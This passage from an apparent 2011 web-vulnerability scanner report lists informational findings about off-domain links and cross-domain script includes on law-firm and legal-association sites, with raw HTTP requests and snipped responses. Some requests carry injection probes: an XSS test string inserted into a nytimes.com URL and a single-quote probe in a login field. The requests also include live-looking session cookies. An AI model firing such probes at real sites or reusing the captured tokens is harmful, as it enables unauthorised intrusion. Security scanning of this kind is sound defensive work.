<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style">
               <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4b4b96e85d543881" class="addthis_button_compact">Share</a>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b4b96e85d543881"></script>
...[SNIP]...
</a>
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4b4b96e85d543881" class="addthis_button_compact at300m shareBttn" >
               <span class="at300bs at15t_compact" style="background: none;">
...[SNIP]...
</span> <a class="socialIcon linkedInBtn" href="http://www.linkedin.com/companies/tydings-%26-rosenberg-llp" target="_blank"> </a> <a class="socialIcon twitterBtn" href="http://twitter.com/TydingsLaw" target="_blank"> </a>
...[SNIP]...
<div class="last">Design: <a target="_blank" class="blueLink" href="http://www.r2integrated.com">R2i</a>
...[SNIP]...
24.41. http://www.wendel.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendel.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.cfm?fuseaction=firmGroups.firmGroupDetail&ID=3986 HTTP/1.1
Host: www.wendel.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wendel.com/
Cookie: CFID=8682898; CFTOKEN=65393107; CFCLIENT_CRAZYFINGERS=personid%3D0%23; CFGLOBALS=urltoken%3DCFID%23%3D8682898%26CFTOKEN%23%3D65393107%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23hitcount%3D2%23cftoken%3D65393107%23cfid%3D8682898%23; LB-Persist=Q7x370Drr/ddufmTEf2ps0e/58OoyB2QIE0OYO6bXUVdnTI+2FWPFqdOsT2Q9bFgo8jfK6xV+tlz5g==; __utma=189412781.958504098.1305216149.1305216149.1305216149.1; __utmb=189412781.1.10.1305216149; __utmc=189412781; __utmz=189412781.1305216149.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wendel%20Rosen

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:02:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D8682898%26CFTOKEN%23%3D65393107%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A55%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2009%3A02%3A19%27%7D%23hitcount%3D3%23cftoken%3D65393107%23cfid%3D8682898%23;expires=Sat, 04-May-2041 16:02:55 GMT;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Wendel
...[SNIP]...
<div class="credit"><a href="http://tenrec.com/" target="_blank" title="Web design and Development by Tenrec, Inc"><img src="layouts/54/graphics/tenrec.gif" alt="Web design and Development by Tenrec, Inc" />
...[SNIP]...
24.42. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=3161 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A12%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.3.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D6%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:14 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<meta name="verify-v1" content="dCBIYm/gkWLFJhYAYXHlMuzv7tvsZob9AGg5Gnr+X7s=" />


<link type="text/css" rel="stylesheet" href="http://www.goclubexe.com/clubportal#mode#/CSS/standard.css">

<link type="text/css" rel="stylesheet" href="http://www.memberize.com/clubportal/wala/CSS/style.css">


<script language="JavaScript" type="text/javascript" src="/clubportal/js/StdPageJavaScript.js">
...[SNIP]...
</span><a href="http://www.wisbar.org/AM/Template.cfm?Section=Search&amp;TEMPLATE=/CM/ContentDisplay.cfm&amp;CONTENTID=83085"><span style="font-size: x-small">
...[SNIP]...
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a>
...[SNIP]...
<br><a href="http://www.elawmarketing.com" target="_blank"><img src="/clubportal/images/logos/elawlogo3.jpg" border="0">
...[SNIP]...
<br>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
24.43. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /ClubPortal/wala/NewsView.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ClubPortal/wala/NewsView.cfm?clubID=177&NewsID=3586 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D4%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.3.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A12%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:12 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!--PUT ANY NEEDED DATA QUERIES HERE--->


   <html>
   <head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks
...[SNIP]...
<meta name="verify-v1" content="dCBIYm/gkWLFJhYAYXHlMuzv7tvsZob9AGg5Gnr+X7s=" />


<link type="text/css" rel="stylesheet" href="http://www.goclubexe.com/clubportal#mode#/CSS/standard.css">

<link type="text/css" rel="stylesheet" href="http://www.memberize.com/clubportal/wala/CSS/style.css">


<script language="JavaScript" type="text/javascript" src="/clubportal/js/StdPageJavaScript.js">
...[SNIP]...
<li><a href="http://www.alanet.org/members/solution/refdesk.aspx">ALA&nbsp;Management Solutions<sup>
...[SNIP]...
<li><a href="http://www.alaencyclopedia.org/"><em>
...[SNIP]...
<li><a href="http://www.alanet.org/lmrc/default.aspx">Legal Management Resource Center (LMRC)</a>
...[SNIP]...
<li><a href="http://www.alanet.org/legalmarketplace/about.asp">Legal Marketplace</a>
...[SNIP]...
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a>
...[SNIP]...
<br><a href="http://www.elawmarketing.com" target="_blank"><img src="/clubportal/images/logos/elawlogo3.jpg" border="0">
...[SNIP]...
<br>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
24.44. http://www.wi-ala.org/clubportal/loginretrieval.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/loginretrieval.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /clubportal/loginretrieval.cfm?clubID=177 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination.&username=
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D5%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.9.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A37%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D10%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:37 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<map name="wala_header_map" id="wala_header_map">
<area shape="rect" coords="2,1,221,134" alt="Wisconsin Association of Legal Administrators Home" href="http://www.wi-alamembers.org" /></map>
...[SNIP]...
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=memberizeaddthis"></script>
...[SNIP]...
<br><a href="http://www.elawmarketing.com" target="_blank"><img src="http://www.wi-ala.org/clubportal/images/logos/elawlogo3.jpg" border="0">
...[SNIP]...
24.45. http://www.wi-ala.org/clubportal/memLogin.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/memLogin.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /clubportal/memLogin.cfm?clubID=177&Message2=Invalid%20User%20Name%2FPassword%20Combination%2E&username=%27 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A02%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D11%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.7.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:11:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A11%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D12%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:11:04 GMT;path=/
Content-Type: text/html; charset=UTF-8


<html xmlns="http://www.w3.org/1999/xhtml">


<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js">
...[SNIP]...
<map name="wala_header_map" id="wala_header_map">
<area shape="rect" coords="2,1,221,134" alt="Wisconsin Association of Legal Administrators Home" href="http://www.wi-alamembers.org" /></map>
...[SNIP]...
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=memberizeaddthis"></script>
...[SNIP]...
<br><a href="http://www.elawmarketing.com" target="_blank"><img src="http://www.wi-ala.org/clubportal/images/logos/elawlogo3.jpg" border="0">
...[SNIP]...
24.46. http://www.wi-ala.org/clubportal/wala/Page.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wi-ala.org
Path:   /clubportal/wala/Page.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /clubportal/wala/Page.cfm?clubID=177&pubmenuoptID=1361 HTTP/1.1
Host: www.wi-ala.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wi-ala.org/ClubPortal/wala/
Cookie: CFID=26522772; CFTOKEN=a920774421289d5b-E56611D9-9F3F-43FD-97A14D1C9ED5D3BD; CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D8%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23; __utma=138668213.1272503015.1305223771.1305223771.1305223771.1; __utmb=138668213.6.10.1305223771; __utmc=138668213; __utmz=138668213.1305223771.1.1.utmcsr=elawmarketing.com|utmccn=(referral)|utmcmd=referral|utmcct=/portfolio/websites/wisconsin-chapter-association-legal-administrators

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 18:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D26522772%26CFTOKEN%23%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23lastvisit%3D%7Bts%20%272011%2D05%2D12%2011%3A10%3A53%27%7D%23timecreated%3D%7Bts%20%272011%2D05%2D12%2011%3A09%3A22%27%7D%23hitcount%3D9%23cftoken%3Da920774421289d5b%2DE56611D9%2D9F3F%2D43FD%2D97A14D1C9ED5D3BD%23cfid%3D26522772%23;expires=Sat, 04-May-2041 18:10:53 GMT;path=/
Content-Type: text/html; charset=UTF-8


               <html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>
Membership -
...[SNIP]...
<meta name="verify-v1" content="dCBIYm/gkWLFJhYAYXHlMuzv7tvsZob9AGg5Gnr+X7s=" />


<link type="text/css" rel="stylesheet" href="http://www.goclubexe.com/clubportal#mode#/CSS/standard.css">

<link type="text/css" rel="stylesheet" href="http://www.memberize.com/clubportal/wala/CSS/style.css">


<script language="JavaScript" type="text/javascript" src="/clubportal/js/StdPageJavaScript.js">
...[SNIP]...
<map name="wala_header_map" id="wala_header_map">
<area shape="rect" coords="2,1,221,134" href="http://www.wi-alamembers.org" alt="Wisconsin Association of Legal Administrators Home" />
</map>
...[SNIP]...
bership in the Wisconsin Association of Legal Administrators (WALA). For the convenience of non-ALA members visiting this site, we have included a hypertext link at the bottom of this page pointing to <a href="http://www.alanet.org/membership/join/default.aspx">alanet.org</a>
...[SNIP]...
<span style="font-size: 10pt;">WALA members can access an alphabetic online <a href="http://www.wi-alamembers.org/clubportal/Profiles.cfm?clubID=177" target="_self"><span style="font-size: 8pt;">
...[SNIP]...
<td align="right"><a target="_blank" style="color: rgb(255,255,255)" href="http://www.elawmarketing.com/">Site provided by eLawMarketing</a>
...[SNIP]...
<br><a href="http://www.elawmarketing.com" target="_blank"><img src="/clubportal/images/logos/elawlogo3.jpg" border="0">
...[SNIP]...
<br>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
24.47. http://www.wiggin.com/showarea.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wiggin.com
Path:   /showarea.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /showarea.aspx?Show=10669 HTTP/1.1
Host: www.wiggin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.wiggin.com/areas.aspx
Cookie: ASP.NET_SessionId=3rofrk45wpkvtc3h2vctwuid; __utma=159286716.445477705.1305216148.1305216148.1305216148.1; __utmb=159286716.2.10.1305216148; __utmc=159286716; __utmz=159286716.1305216148.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Wiggin%20and%20Dana

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Thu, 12 May 2011 16:04:36 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 34422


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   
<title>Wiggin and
...[SNIP]...
<link rel="shortcut icon" href="http://www.wiggin.com/favicon.ico" type="image/x-icon" />
<link rel="favicon" href="http://216.109.139.38/favicon.ico" type="image/x-icon" />    
<script src="js/jquery-1.4.2.min.js" type="text/javascript">
...[SNIP]...
25. Cross-domain script include  previous  next
There are 93 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

25.1. http://baxterhall.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://baxterhall.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: baxterhall.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:44:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Railo-Version: 3.2.2.000
Set-Cookie: CFID=b99e9c47%2Dd25f%2D494e%2D9dc2%2D4c7b8f84071b; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Set-Cookie: CFTOKEN=0; domain=baxterhall.com; path=/; expires=Sat, 11-May-2041 02:36:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10450


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-equiv="
...[SNIP]...
<!-- Generated by OpenX 2.8.5-rc7 -->
   <script type='text/javascript' src='http://d1.openx.org/spcjs.php?id=34947'></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
   <script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.validate.js"></script>
   <script type="text/javascript" src="http://downloads.mailchimp.com/js/jquery.form.js"></script>
...[SNIP]...
<p>
<script src="http://baxterhall.editmysite.net/tiny_mce/themes/advanced/langs/en.js" type="text/javascript"></script>
...[SNIP]...
<span style="font-size: x-small;">We h
<script src="http://baxterhall.editmysite.net/tiny_mce/themes/advanced/langs/en.js" type="text/javascript"></script>
it
<script src="http://baxterhall.editmysite.net/tiny_mce/themes/advanced/langs/en.js" type="text/javascript"></script>
...[SNIP]...
scribbled notes you find in the margin of a well-read book &ndash; little tips, insights and cues that you didn&rsquo;t know you needed but are really glad you found!&nbsp; Here our writers will shar
<script src="http://baxterhall.editmysite.net/tiny_mce/themes/advanced/langs/en.js" type="text/javascript"></script>
...[SNIP]...
25.2. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-nytimes_display_html&format=728x90_pas_abgc&output=html&h=90&w=728&lmt=1305230017&channel=ROS_leaderboard&ad_type=image%2Cflash&alternate_ad_url=http%3A%2F%2Fwww.nytimes.com%2Fads%2Fremnant%2Fnetworkredirect-leaderboard.html&oe=utf8&flash=0&url=http%3A%2F%2Fwww.nytimes.com%2F2010%2F08%2F22%2Fsports%2Fcycling%2F22armstrong.html%3F59261%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E223d24b026d%3D1&adsafe=high&targeting=site&dt=1305230025334&bpp=2&shv=r20110427&jsv=r20110506&correlator=1305230043462&frm=0&adk=966927225&ga_vid=2015666648.1305230048&ga_sid=1305230048&ga_hid=121312136&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=5&u_nmime=39&biw=1153&bih=938&ref=http%3A%2F%2Fburp%2Fshow%2F7&fu=0&ifi=1&dtd=M&xpc=2NMBBNFUIU&p=http%3A//www.nytimes.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html?59261%22%3E%3Cscript%3Ealert(1)%3C/script%3E223d24b026d=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 19:54:10 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4706

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
